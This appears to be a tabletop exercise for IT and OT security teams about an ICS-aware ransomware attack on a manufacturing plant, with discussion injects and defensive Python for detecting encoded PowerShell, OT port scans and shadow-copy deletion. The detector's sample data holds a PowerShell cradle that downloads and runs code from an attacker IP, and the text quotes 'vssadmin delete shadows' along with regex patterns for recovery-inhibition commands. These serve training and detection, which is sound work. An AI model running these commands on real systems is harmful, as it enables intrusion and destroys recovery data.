SC-011: OT/ICS Ransomware — Manufacturing Plant¶
Scenario Header
Type: OT/ICS | Difficulty: ★★★★☆ | Duration: 3–4 hours | Participants: 5–10
Threat Actor: RaaS affiliate — opportunistic + ICS-aware (Cl0p/LockBit industrial affiliate composite)
Primary ATT&CK Techniques: T1566.001 · T1059.001 · T1053.005 · T1021.006 · T1021.001 · T0886 · T0846 · T0882 · T1486 · T1490 · T1489 · T0828
Facilitator Note
This scenario requires participants from both IT and OT/operational teams. If running with a purely IT security audience, pre-assign someone to play the role of "Plant Operations Manager" — a non-security stakeholder whose input is critical to the safety shutdown decision in Phase 3. The most important learning outcome is the IT/OT coordination failure mode.
Threat Actor Profile¶
CARBON WRENCH (internal tracking; overlaps with public reporting on Cl0p industrial affiliates) is a ransomware affiliate operating under a RaaS model. Unlike generic ransomware actors, CARBON WRENCH purchases access from Initial Access Brokers (IABs) specifically seeking industrial organizations. They use an ICS-aware variant of LockBit 3.0 modified to skip files matching *.prj, *.rtu, *.plc, *.tag, and *.cip extensions — preserving PLC logic files to avoid triggering immediate physical safety events that would complicate negotiations.
The group's playbook: encrypt IT + OT historian layers, display ransom note on HMI screens for psychological impact, exfiltrate operational data (recipes, safety setpoints, maintenance logs) for double extortion, demand $800K–$5M in Monero. Average dwell time before encryption: 5–14 days (shorter than APT; goal is financial, not espionage).
Scenario Narrative¶
Phase 1 — IT Foothold via Phishing (~30 min)¶
A maintenance engineer at Contoso Manufacturing's Springfield plant receives a phishing email impersonating a spare parts vendor, with a malicious Excel macro attachment (Hydraulic_Parts_Quote_March.xlsm). The engineer opens the file and enables macros. A PowerShell cradle downloads and executes a Cobalt Strike beacon staged on hxxps://185.220.101.47/logo.png (polyglot PNG/shellcode). The beacon establishes persistence via a scheduled task: \Microsoft\Windows\SyncCenter\SyncCenter.
The engineering workstation (EWS-PROD-01) sits in the OT DMZ — it has legitimate network access to both corporate IT (for parts ordering) and the SCADA/historian network. This is the IT/OT network bridge the attacker exploits.
Evidence Artifacts:
| Artifact | Detail |
|---|---|
| Email Gateway | Inbound from parts@hydraulic-systems-supply[.]com — SPF: FAIL — Attachment: Hydraulic_Parts_Quote_March.xlsm — Macro-enabled workbook |
| EDR (EWS-PROD-01) | EXCEL.EXE spawns cmd.exe → powershell.exe -enc <base64> — Beacon established to 185.220.101.47:443 |
| Windows Security Event Log | EventID 4698: Scheduled task created — Task: \Microsoft\Windows\SyncCenter\SyncCenter — RunAs: SPRINGFIELD\engr_maint |
| Network Firewall | Outbound HTTPS from EWS-PROD-01 (10.50.10.22) to 185.220.101.47 — New connection, not in baseline — No block rule (HTTPS to internet is permitted from OT DMZ for vendor access) |
Phase 1 — Discussion Inject
Technical: EWS-PROD-01 is in the OT DMZ and has internet access for vendor communication. What network segmentation architecture would permit vendor access while preventing a compromised EWS from beaconing to external C2? Draw the firewall rule set change.
Decision: Your EDR alert fires during a shift change at 06:50 UTC — a period your SOC covers with 50% staffing. The on-call analyst sees the alert but the plant is mid-production run. Containing the workstation by isolating it from the network could disrupt the production process management system (PIMS) that EWS-PROD-01 feeds. Do you isolate immediately or delay until end-of-shift? What information do you need from operations before deciding?
Expected Analyst Actions:
- [ ] Immediately contact OT/plant operations to assess the impact of isolating EWS-PROD-01
- [ ] Pull the PowerShell command line and decode the base64 payload (PowerShell -enc is base64 over UTF-16LE, not UTF-8)
- [ ] Check threat intel for 185.220.101.47: in this scenario it is a known Cobalt Strike team server
- [ ] Identify all network connections from EWS-PROD-01 into the OT network
- [ ] Pull the scheduled task XML from C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter\ for full persistence artifact documentation
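Two of the analyst actions above, spotting an Office application that reaches a script host through an intermediate cmd.exe and decoding the -enc payload, can be scripted against process-creation records. The Python below is an added example for this exercise, not code from the scenario or from any EDR vendor; the event records, the cradle text and the field names (host, ancestors, image, cmdline) are constructed for the example.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Office applications whose descendants should never be shells or script hosts
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# Matching only those prefixes avoids false hits on -ExecutionPolicy / -ep.
_ENC_FORMS = ["ec"] + ["encodedcommand"[:i] for i in range(1, 15)]
_ENC_SWITCH = re.compile(r"(?i)(?:^|\s)-(?:" + "|".join(_ENC_FORMS) + r")\s+([A-Za-z0-9+/=]+)")
_CRADLE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|"
                     r"invoke-expression|net\.webclient")

def encode_ps(command: str) -> str:
    """-enc takes base64 of UTF-16LE text; decoding it as UTF-8 yields garbage."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

def decode_ps(blob: str) -> str:
    return base64.b64decode(blob).decode("utf-16-le")

@dataclass
class Finding:
    host: str
    chain: str
    reasons: List[str] = field(default_factory=list)
    decoded: Optional[str] = None

def analyze(events) -> List[Finding]:
    """events: constructed EDR process-creation records with an ancestor list
    (oldest first), the new process image, and its command line."""
    findings = []
    for ev in events:
        ancestors = [a.lower() for a in ev["ancestors"]]
        image = ev["image"].lower()
        f = Finding(ev["host"], " -> ".join(ancestors[-2:] + [image]))
        # parent OR grandparent is Office: catches EXCEL -> cmd -> powershell
        if image in SCRIPT_HOSTS and OFFICE_APPS & set(ancestors[-2:]):
            f.reasons.append("office_spawns_script_host")
        m = _ENC_SWITCH.search(ev["cmdline"])
        if m:
            try:
                f.decoded = decode_ps(m.group(1))
                f.reasons.append("encoded_powershell")
            except (ValueError, UnicodeDecodeError):
                f.reasons.append("undecodable_encoded_arg")
        if f.decoded and _CRADLE.search(f.decoded):
            f.reasons.append("download_cradle")
        if f.reasons:
            findings.append(f)
    return findings

# Constructed sample telemetry for this example (not the scenario's real EDR output).
# The cradle text is a placeholder built here; only the C2 address comes from the page.
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('https://185.220.101.47/logo.png')"
SAMPLE_EVENTS = [
    {"host": "EWS-PROD-01", "ancestors": ["explorer.exe", "EXCEL.EXE", "cmd.exe"],
     "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_ps(SAMPLE_CRADLE)},
    {"host": "EWS-PROD-01", "ancestors": ["services.exe", "svchost.exe"],
     "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\pi_export.ps1"},
    {"host": "HMI-02", "ancestors": ["explorer.exe", "WINWORD.EXE"],
     "image": "splwow64.exe", "cmdline": "splwow64.exe 12288"},   # normal Office print helper
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f.host, f.chain, f.reasons, f.decoded)
```

The second record (a scheduled export script launched by the service control manager) and the third (Office spawning its print helper) produce no finding, which is the point of keying on the ancestor chain plus the exact switch rather than on "powershell.exe" alone.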
Phase 2 — IT-to-OT Pivot via SCADA Historian (~40 min)¶
With EWS-PROD-01 compromised, the attacker uses Cobalt Strike's jump winrm64 to pivot to HIST-01 — the OSIsoft PI System historian server running Windows Server 2016 (missing 18 months of patches). HIST-01 aggregates real-time process data from all PLCs and HMIs on the plant floor. It is the highest-value IT/OT bridge system.
From HIST-01, the attacker enumerates the OT network (192.168.100.0/24) using native ping, arp -a, and a simple PowerShell TCP port scanner. They identify:
- 4× HMI stations running GE iFIX (192.168.100.10–13)
- 2× Siemens S7-300 PLC programming terminals (192.168.100.20–21)
- The safety instrumented system (SIS) network appears isolated (no ping response from HIST-01), but the attacker cannot confirm this
Evidence Artifacts:
| Artifact | Detail |
|---|---|
| Windows Security Event Log (HIST-01) | EventID 4624, Logon Type 3 (Network; WinRM does not produce Type 10, which is RDP) — Source: EWS-PROD-01 (10.50.10.22) — Account: engr_maint — followed by wsmprovhost.exe spawning under the WinRM service — Day 2, 03:12 UTC |
| PI System Access Log | engr_maint account — Queried all PI tags (>12,000) — Enumerated all data streams — 03:14–03:47 UTC |
| Network (HIST-01) | ICMP sweep to 192.168.100.0/24 — 254 hosts in 8 seconds — PowerShell port scan (TCP 102, 502, 44818 — ICS protocols) |
| Windows Update Log (HIST-01) | Last update: 2024-09-14 — 18 months out of patch |
| Vulnerability Assessment | HIST-01 is 18 months behind on Windows updates; the attacker elevates from engr_maint to SYSTEM with a public local privilege escalation exploit (the exercise uses the placeholder identifier CVE-2024-1234; substitute a real, unpatched LPE from your own scan data when running this) |
Phase 2 — Discussion Inject
Technical: The attacker scanned for TCP ports 102 (S7comm/Siemens), 502 (Modbus), and 44818 (EtherNet/IP). What does scanning for these specific ports tell you about the attacker's ICS knowledge? How would you detect this OT protocol port scan if your ICS network has no EDR or IDS?
Decision: You've confirmed the attacker is on HIST-01 and has enumerated the OT network. You cannot confirm whether the Safety Instrumented System (SIS) is isolated or accessible. The plant is running at full production. Three options: (A) immediately shut down production as a precaution; (B) continue production while containing IT systems and investigating; (C) take HIST-01 offline (halts real-time process monitoring but leaves PLCs running). What do you choose, and who has the authority to decide?
Expected Analyst Actions:
- [ ] Immediately notify the Plant Manager and OT Engineer: this is now an OT incident
- [ ] Verify SIS network isolation through physical inspection (do NOT rely on software tools on the compromised network)
- [ ] Obtain a full memory image of HIST-01 before any containment action
- [ ] Enumerate all accounts that have logged on to HIST-01 in the past 14 days (EventID 4624 and 4648)
- [ ] Contact CISA (ICS-CERT): early notification is recommended for OT incidents
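The Phase 2 inject asks how to catch the ICMP sweep and the TCP 102/502/44818 probes when the ICS network has no EDR or IDS. If the OT switches can export flow records (or a SPAN port feeds a collector), the detection reduces to counting distinct destinations per source inside a short window, plus comparing ICS-port conversations against a learned baseline. The Python below is an added example, not part of the scenario; the flow-log format, the 10.50.10.30 address for HIST-01 (the page gives none) and the timestamps are constructed for it.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Set, Tuple

# Common ICS/OT service ports; the scenario's attacker probed the first three
ICS_PORTS = {102: "S7comm", 502: "Modbus/TCP", 44818: "EtherNet/IP",
             20000: "DNP3", 2404: "IEC 60870-5-104", 4840: "OPC UA"}
FMT = "%Y-%m-%dT%H:%M:%SZ"
Flow = Tuple[datetime, str, str, str, int]          # (ts, src, dst, proto, dport)

def parse_flow(line: str) -> Flow:
    """Constructed flow-log line: '<ts> <src> <dst> <proto> <dport>' (dport 0 for ICMP)."""
    ts, src, dst, proto, dport = line.split()
    return datetime.strptime(ts, FMT), src, dst, proto, int(dport)

def detect_sweeps(flows: Iterable[Flow], window=timedelta(seconds=60),
                  min_hosts=10) -> Dict[Tuple[str, str], int]:
    """Per source, count distinct destinations reached by ICMP or on ICS ports inside a
    sliding window; return {(src, kind): peak_distinct_hosts} for sources over threshold."""
    per_key: Dict[Tuple[str, str], List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, src, dst, proto, dport in flows:
        if proto == "icmp":
            per_key[(src, "icmp_sweep")].append((ts, dst))
        elif proto == "tcp" and dport in ICS_PORTS:
            per_key[(src, "ics_port_scan")].append((ts, dst))
    alerts: Dict[Tuple[str, str], int] = {}
    for key, hits in per_key.items():
        hits.sort()
        in_window: Dict[str, int] = defaultdict(int)
        left = 0
        for ts, dst in hits:
            in_window[dst] += 1
            while ts - hits[left][0] > window:       # evict hits older than the window
                old = hits[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            if len(in_window) >= min_hosts:
                alerts[key] = max(alerts.get(key, 0), len(in_window))
    return alerts

def baseline_deviations(flows: Iterable[Flow],
                        baseline: Set[Tuple[str, str, int]]) -> Set[Tuple[str, str, int]]:
    """ICS-port conversations absent from the learned baseline. A historian that suddenly
    speaks S7comm or Modbus to HMIs is a deviation even if it touches only a few hosts."""
    return {(s, d, p) for _, s, d, pr, p in flows
            if pr == "tcp" and p in ICS_PORTS and (s, d, p) not in baseline}

def sample_flows() -> List[Flow]:
    """Constructed traffic: ten minutes of normal HMI->PLC polling, then the attacker's
    254-host ICMP sweep in 8 s and TCP 102/502/44818 probes of the responsive hosts."""
    base = datetime(2026, 3, 17, 3, 52, 0)
    lines = [f"{(base + timedelta(seconds=5 * i)).strftime(FMT)} 192.168.100.10 192.168.100.20 tcp 102"
             for i in range(120)]
    lines += [f"{(base + timedelta(seconds=30 + i * 8 / 254)).strftime(FMT)} 10.50.10.30 192.168.100.{i} icmp 0"
              for i in range(1, 255)]
    for j, host in enumerate(range(10, 22)):
        for k, port in enumerate((102, 502, 44818)):
            lines.append(f"{(base + timedelta(seconds=60 + 2 * j + k)).strftime(FMT)} "
                         f"10.50.10.30 192.168.100.{host} tcp {port}")
    return [parse_flow(l) for l in lines]

if __name__ == "__main__":
    flows = sample_flows()
    print(detect_sweeps(flows))
    print(len(baseline_deviations(flows, {("192.168.100.10", "192.168.100.20", 102)})))
```

The threshold of ten distinct hosts in sixty seconds is deliberately loose for a plant floor, where legitimate polling is periodic and one-to-few; the baseline check is the stronger signal because a historian normally collects from a fixed set of interface nodes and never initiates S7comm or Modbus sessions of its own.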
Phase 3 — Ransomware Deployment & HMI Display (~45 min)¶
On Day 5 of dwell, CARBON WRENCH deploys the ransomware payload. lockbit_ics.exe executes on HIST-01 and all reachable Windows hosts in the IT/OT DMZ. The ICS-aware variant skips *.prj, *.rtu, *.plc, *.tag and *.cip files to avoid disrupting PLC logic directly. All other files are encrypted with AES-256 + RSA-4096.
Encrypted: the entire PI historian database (6 years of process data), maintenance records, batch recipe database, quality control records, and all backup files on \\BACKUP-SRV\hist_backup\ (the backup share was accessible from HIST-01).
The attacker accesses HMI-01 via RDP (default credentials unchanged: Administrator / admin123). They do not modify any PLC setpoints; instead they display the ransom note as a full-screen browser popup on the HMI display visible to the plant floor. With the HMI unusable and process visibility lost, the plant operator manually initiates an emergency stop (E-Stop) of the production line.
Evidence Artifacts:
| Artifact | Detail |
|---|---|
| File System (HIST-01) | 847,293 files encrypted — Extension: .lockbit3 — Ransom note: !!!-Restore-My-Files-!!!.txt on every directory — PI historian database: 100% encrypted |
| Backup Share | \\BACKUP-SRV\hist_backup\ — All backup files encrypted — Volume Shadow Copies deleted (EventID 7036: vss service stopped, vssadmin delete shadows /all /quiet) |
| HMI-01 | RDP login from HIST-01 — Account: Administrator — Default credentials used — Ransom note displayed full-screen on GE iFIX HMI |
| Production System | Emergency stop initiated by plant operator at Day 5, 14:22 UTC — Production line halted — Estimated cost: $2.3M/day |
| Ransom Note | Demand: $2.2M in Monero — Negotiation email: decrypt@proton.me — 72-hour deadline — Threat: publish operational recipes and safety setpoint data |
Phase 3 — Discussion Inject
Technical: The attacker deleted Volume Shadow Copies using vssadmin delete shadows /all /quiet. This is a standard ransomware anti-recovery tactic. What detection rule would you write (Sigma or KQL) to alert on VSS deletion? What is the minimum SIEM log source required for this detection?
Decision (Safety-Critical): The plant operator performed an emergency stop after seeing the HMI ransom note. The Safety Instrumented System appears unaffected (no ping response from compromised hosts). However, you cannot verify SIS integrity from the compromised network. The Plant Manager asks: "Can we restart production? The SIS shows green." Do you recommend restart? What is your verification procedure for the SIS before allowing restart, and who makes the final call?
Expected Analyst Actions:
- [ ] MANDATORY: physical inspection of the SIS; bring in an OT engineer to verify SIS integrity off-network
- [ ] Do NOT restart production until the SIS is independently verified
- [ ] Notify CISA (ICS-CERT) immediately and treat OT ransomware at a critical-manufacturing site as reportable (under CIRCIA, covered entities must report covered incidents within 72 hours and ransom payments within 24 hours once its reporting rule is in force; confirm the current obligation with counsel)
- [ ] Assess backup integrity: are air-gapped/offline backups available? (Check: tape, immutable cloud copy, offline copy)
- [ ] Contact the cyber insurance carrier and confirm the policy terms for a ransomware-triggered production halt
- [ ] Begin negotiation assessment: involve the FBI and legal counsel before any contact with the attacker, and run an OFAC sanctions check before any payment is even considered
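For the Phase 3 technical inject (a detection for vssadmin delete shadows), the Python below runs Sigma-style selection logic over process-creation events; it is an added example, not part of the scenario or any published rule set. It also answers the log-source question: the detection needs the command line, which Security EventID 4688 only carries when "Include command line in process creation events" is enabled, whereas Sysmon EventID 1 always has it. The event records and host names are constructed for the example.

```python
import re
from typing import Dict, List

# Recovery-inhibition command patterns (ATT&CK T1490). This is the same selection logic
# a Sigma rule would carry, written as regexes so it runs over raw events here.
INHIBIT_RECOVERY = [
    ("vssadmin_delete_shadows",  r"vssadmin(?:\.exe)?\b.*\bdelete\s+shadows"),
    ("vssadmin_resize_storage",  r"vssadmin(?:\.exe)?\b.*\bresize\s+shadowstorage\b.*/maxsize="),
    ("wmic_shadowcopy_delete",   r"wmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b"),
    ("bcdedit_disable_recovery", r"bcdedit(?:\.exe)?\b.*(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)"),
    ("wbadmin_delete_backup",    r"wbadmin(?:\.exe)?\b.*\bdelete\s+(?:catalog|systemstatebackup)"),
    ("powershell_shadowcopy",    r"win32_shadowcopy\b.*(?:\.delete\(\)|remove-(?:wmi|cim)object)"),
]
_COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in INHIBIT_RECOVERY]
_RECOVERY_TOOLS = ("vssadmin.exe", "wmic.exe", "bcdedit.exe", "wbadmin.exe")

def normalize(event: Dict) -> Dict:
    """Map Security 4688 and Sysmon EID 1 field names onto one shape."""
    if event.get("EventID") == 4688:     # Security log; CommandLine only present with auditing on
        return {"host": event["Computer"], "image": event["NewProcessName"],
                "cmdline": event.get("CommandLine", ""), "source": "security_4688"}
    if event.get("EventID") == 1:        # Sysmon process creation; always has CommandLine
        return {"host": event["Computer"], "image": event["Image"],
                "cmdline": event.get("CommandLine", ""), "source": "sysmon_1"}
    raise ValueError(f"unsupported event {event.get('EventID')}")

def scan(events: List[Dict]) -> List[Dict]:
    alerts = []
    for raw in events:
        ev = normalize(raw)
        cmd = " ".join(ev["cmdline"].split())     # collapse whitespace-padding evasion
        image = ev["image"].lower()
        if not cmd and image.endswith(_RECOVERY_TOOLS):
            # The tool ran but the SIEM never received its arguments: the one field this
            # detection needs is missing. Surface the gap instead of failing silently.
            alerts.append({"host": ev["host"], "rule": "telemetry_gap_no_cmdline", "cmd": image})
            continue
        for name, rx in _COMPILED:
            if rx.search(cmd):
                alerts.append({"host": ev["host"], "rule": name, "cmd": cmd})
                break
    return alerts

# Constructed sample events for this example (not real logs from the scenario)
SAMPLE_PROCESS_EVENTS = [
    {"EventID": 1, "Computer": "HIST-01", "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin  delete shadows /all /quiet", "ParentImage": r"C:\Temp\lockbit_ics.exe"},
    {"EventID": 4688, "Computer": "HIST-01", "NewProcessName": r"C:\Windows\System32\bcdedit.exe",
     "CommandLine": "bcdedit /set {default} recoveryenabled No"},
    {"EventID": 1, "Computer": "HIST-01", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic shadowcopy delete"},
    {"EventID": 4688, "Computer": "BACKUP-SRV", "NewProcessName": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin list shadows"},                     # benign backup-admin check
    {"EventID": 4688, "Computer": "HMI-01", "NewProcessName": r"C:\Windows\System32\vssadmin.exe"},
    # ^ command-line auditing not enabled on HMI-01, so the arguments never reached the SIEM
]

if __name__ == "__main__":
    for a in scan(SAMPLE_PROCESS_EVENTS):
        print(a)
```

System EventID 7036 ("Volume Shadow Copy service entered the stopped state") is supporting evidence only: VSS stops on its own after idle time, so it cannot anchor the alert by itself.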
Phase 4 — Recovery Decision & ICS-CERT Notification (~40 min)¶
The backup integrity check reveals the worst: all network-accessible backups were encrypted. The last known-good offline backup is a tape from 6 weeks ago — restoring from tape would lose 6 weeks of process recipe improvements, quality calibration data, and maintenance history.
Three recovery paths:
1. Pay ransom ($2.2M Monero): fastest recovery (~48h if the decryptor works), but funds criminal activity, there is no guarantee the decryptor works, the FBI strongly discourages it, and a payment to a sanctioned actor exposes the company to OFAC liability
2. Restore from tape (6-week-old backup): $2.3M/day production loss × estimated 5 days = $11.5M in downtime + 6 weeks of lost data
3. Professional recovery firm: ICS-CERT provides a referral; estimated 7–10 days, partial data recovery possible using forensic reconstruction of the PI historian
Reporting to CISA (which absorbed ICS-CERT) is strongly encouraged for any OT ransomware event, and for covered entities in the critical manufacturing sector it becomes a legal obligation under CIRCIA once its reporting rule is in force (covered incidents within 72 hours, ransom payments within 24 hours); confirm the current obligation with legal counsel rather than assuming either way. The FBI requests a copy of the ransom note and any attacker communications for attribution and cryptocurrency tracking.
Evidence Artifacts:
| Artifact | Detail |
|---|---|
| Backup Assessment | \\BACKUP-SRV\hist_backup\ — 100% encrypted; last-modified timestamp matches ransomware execution (Day 5, 14:08 UTC) |
| Tape Backup | Last verified offline backup: 2026-02-02 (6 weeks prior) — Stored in fireproof cabinet, physically isolated |
| PI Historian Recovery | Vendor OSIsoft/AVEVA: partial reconstruction possible from compressed archive buffer on HIST-01 — estimated 70% recovery |
| ICS-CERT | CISA ICS-CERT incident tracking: ICS-2026-003421 — Response team available within 24h |
| Insurance | Cyber policy: $5M limit — ransomware covered — sublimit for OT/ICS incidents: $2M — business interruption coverage: 30-day waiting period |
Phase 4 — Discussion Inject
Technical: OSIsoft PI System historian data is stored in a proprietary binary format. If the encryption targeted all files, how would a forensic recovery specialist attempt to reconstruct the historian database? What forensic artifacts (Windows memory, network buffer, application logs) might contain recoverable data?
Decision: The CEO and CFO are in the room. They want to know: pay or don't pay? Present your recommendation with supporting rationale, covering: FBI guidance, insurance position, decryptor reliability statistics, reputational risk, and regulatory implications. You have 5 minutes.
Expected Analyst Actions:
- [ ] File formal notification with CISA via https://www.cisa.gov/report
- [ ] Contact the FBI cyber division: provide the ransom note, attacker email, and cryptocurrency wallet address
- [ ] Begin tape restoration in parallel with the other options (tape restore is the safe baseline)
- [ ] Engage the ICS-CERT referral for a professional recovery firm as a parallel track
- [ ] Document all recovery costs for the insurance claim and regulatory reporting
- [ ] Conduct a post-incident architecture review: air-gapped backup requirement, network segmentation, OT patching program
Detection Opportunities¶
| Phase | Technique | ATT&CK | Detection Method | Difficulty |
|---|---|---|---|---|
| 1 | Macro-enabled phishing | T1566.001 | Email gateway: block macro-enabled Office files from external senders | Easy |
| 1 | PowerShell C2 cradle | T1059.001 | EDR: Office spawning PowerShell + outbound HTTPS | Easy |
| 1 | Scheduled task persistence | T1053.005 | SIEM: EventID 4698 — scheduled task created by Office process | Medium |
| 2 | WinRM lateral movement | T1021.006 | SIEM: EventID 4624 Logon Type 3 on the historian from an OT DMZ host plus wsmprovhost.exe process creation; inbound TCP 5985/5986 to HIST-01 in firewall logs | Medium |
| 2 | OT protocol port scan | T0846 | OT network IDS (Claroty/Dragos): ICMP sweep + ICS port scan; without an IDS, flow records or a SPAN port and a rule for one source touching many hosts on 102/502/44818 | Hard |
| 2 | Unpatched historian | — | Vulnerability scanner on OT network (requires OT-safe scanner) | Easy |
| 3 | VSS deletion | T1490 | SIEM: Security EventID 4688 with command-line auditing (or Sysmon EventID 1) for vssadmin delete shadows; System EventID 7036 (VSS stop) is corroboration only | Easy |
| 3 | Default HMI credentials | T1078.001 | CIS/ICS benchmark: privileged account audit for default passwords | Easy |
| 3 | Ransomware mass encrypt | T1486 | EDR: high-volume file rename/modify events (honeypot files) | Medium |
Key Discussion Questions¶
- The OT DMZ engineering workstation had unrestricted internet access. What is the minimum-privilege network architecture for an engineering workstation that needs vendor access?
- HIST-01 was 18 months behind on patches. What is the appropriate patch management process for OT historian servers that cannot tolerate unplanned downtime?
- The HMI used default credentials (Administrator/admin123). What CIS control or ICS security standard explicitly addresses default credential remediation on ICS devices?
- All network-accessible backups were encrypted. What is the 3-2-1-1-0 backup rule, and how would it have changed the recovery options?
- The plant operator made a safety decision (E-Stop) based on seeing the HMI ransom note. What pre-planned ICS incident response procedure would have guided this decision rather than leaving it to individual operator judgment?
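For the Phase 1 inject and the first question above (the firewall rule set change for the engineering workstation), the Python below models the before and after rule sets and evaluates the scenario's flows against both. It is an added example, not the plant's real policy; HIST-01 at 10.50.10.30, an explicit proxy at 10.50.1.10:3128, the PI Data Archive port TCP 5450, a Modbus/TCP collection rule for the historian and the vendor FQDN are assumptions made for the example.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

@dataclass(frozen=True)
class Rule:
    action: str              # "allow" or "deny"
    src: str                 # CIDR
    dst: str                 # CIDR
    proto: str               # "tcp", "udp" or "any"
    dport: Optional[int]     # None = any port
    note: str = ""

def evaluate(rules: List[Rule], src: str, dst: str, proto: str, dport: int) -> Tuple[str, str]:
    """First-match evaluation with an implicit deny at the end, as most firewalls do it."""
    s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    for r in rules:
        if (s in ipaddress.ip_network(r.src) and d in ipaddress.ip_network(r.dst)
                and r.proto in ("any", proto) and r.dport in (None, dport)):
            return r.action, r.note
    return "deny", "implicit deny"

# Assumed addresses for the example; the page only gives EWS-PROD-01 = 10.50.10.22
OT_DMZ, EWS, HIST, PROXY = "10.50.10.0/24", "10.50.10.22/32", "10.50.10.30/32", "10.50.1.10/32"
OT_NET, INTERNET = "192.168.100.0/24", "0.0.0.0/0"

# Before: the policy implied by Phase 1. Flat inside the DMZ, flat into the plant floor,
# and any DMZ host may reach any internet address on 443, which is all the beacon needed.
BEFORE = [
    Rule("allow", OT_DMZ, OT_DMZ, "any", None, "flat OT DMZ"),
    Rule("allow", OT_DMZ, OT_NET, "any", None, "DMZ to plant floor"),
    Rule("allow", OT_DMZ, INTERNET, "tcp", 443, "vendor HTTPS"),
]

# After: the EWS talks only to the explicit proxy and to the historian's PI port, the
# historian collects on its assumed Modbus/TCP port only, and everything else is logged
# and dropped. Internet egress exists solely through the proxy's FQDN allow-list.
AFTER = [
    Rule("allow", EWS, PROXY, "tcp", 3128, "explicit web proxy, vendor allow-list"),
    Rule("allow", EWS, HIST, "tcp", 5450, "PI Data Archive feed"),
    Rule("allow", HIST, OT_NET, "tcp", 502, "historian collection (assumed Modbus/TCP)"),
    Rule("deny", OT_DMZ, INTERNET, "any", None, "log and drop: no direct egress from OT DMZ"),
]

VENDOR_ALLOWLIST = {"parts-portal.vendor.example"}   # assumed vendor FQDN

def proxy_allows(destination: str) -> bool:
    """Proxy policy: FQDN must be allow-listed; a bare IP is never allowed, so a cradle
    fetching https://185.220.101.47/logo.png is refused even if it discovers the proxy."""
    try:
        ipaddress.ip_address(destination)
        return False
    except ValueError:
        return destination.lower() in VENDOR_ALLOWLIST

# Flows from the scenario (plus the legitimate PI feed the EWS needs)
CHECKS = {
    "beacon_direct_443": ("10.50.10.22", "185.220.101.47", "tcp", 443),
    "vendor_via_proxy":  ("10.50.10.22", "10.50.1.10", "tcp", 3128),
    "winrm_ews_to_hist": ("10.50.10.22", "10.50.10.30", "tcp", 5985),
    "pi_feed":           ("10.50.10.22", "10.50.10.30", "tcp", 5450),
    "rdp_hist_to_hmi":   ("10.50.10.30", "192.168.100.10", "tcp", 3389),
}

def compare(before: List[Rule], after: List[Rule]) -> Dict[str, Tuple[str, str]]:
    """{flow name: (decision before, decision after)}"""
    return {name: (evaluate(before, *f)[0], evaluate(after, *f)[0]) for name, f in CHECKS.items()}

if __name__ == "__main__":
    for name, (b, a) in compare(BEFORE, AFTER).items():
        print(f"{name:20s} before={b:5s} after={a}")
```

The after set blocks all three attacker hops on the page (C2 beacon, WinRM to the historian, RDP from the historian to the HMI) while the EWS keeps its two real needs. It still leaves the EWS in a position to reach the historian, which is why the architectural answer is also to move vendor browsing off the engineering workstation entirely rather than only to tighten its rules.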
Debrief Guide¶
What Went Well¶
- The Safety Instrumented System survived: physical isolation of the SIS network held, confirmed by off-network inspection rather than by the "green" status seen from the compromised network
- ICS-CERT was notified promptly and provided valuable recovery resources
- The plant operator correctly executed emergency stop procedures
Key Learning Points¶
- OT/IT convergence is the primary attack surface — the EWS bridge host was the entry point to OT; engineering workstations must be treated as high-value targets
- Patching OT systems requires a different process — not an excuse to skip it; work with vendor for maintenance window patching
- Default credentials on HMI/SCADA are unacceptable — a basic CIS/IEC 62443 control that is frequently missed
- Backup strategy must account for ransomware — network-accessible backups are not recovery backups; 3-2-1-1-0 rule requires offline/air-gapped copy
- SIS independence is your last line of defense — never assume SIS is safe because it "shows green" on a compromised network
Recommended Follow-Up¶
- [ ] Implement 3-2-1-1-0 backup strategy: include air-gapped/tape copy verified monthly
- [ ] Conduct OT network segmentation review — enforce Purdue Model or IEC 62443 zones
- [ ] Audit all OT/ICS devices for default credentials — remediate within 30 days
- [ ] Deploy OT-specific IDS (Claroty, Dragos, Nozomi) on ICS network
- [ ] Create and exercise an OT-specific Incident Response plan — separate from IT IR plan
- [ ] Establish OT patch management policy — quarterly patching for historian/HMI servers
- [ ] Contact ICS-CERT for free assessment resources and information sharing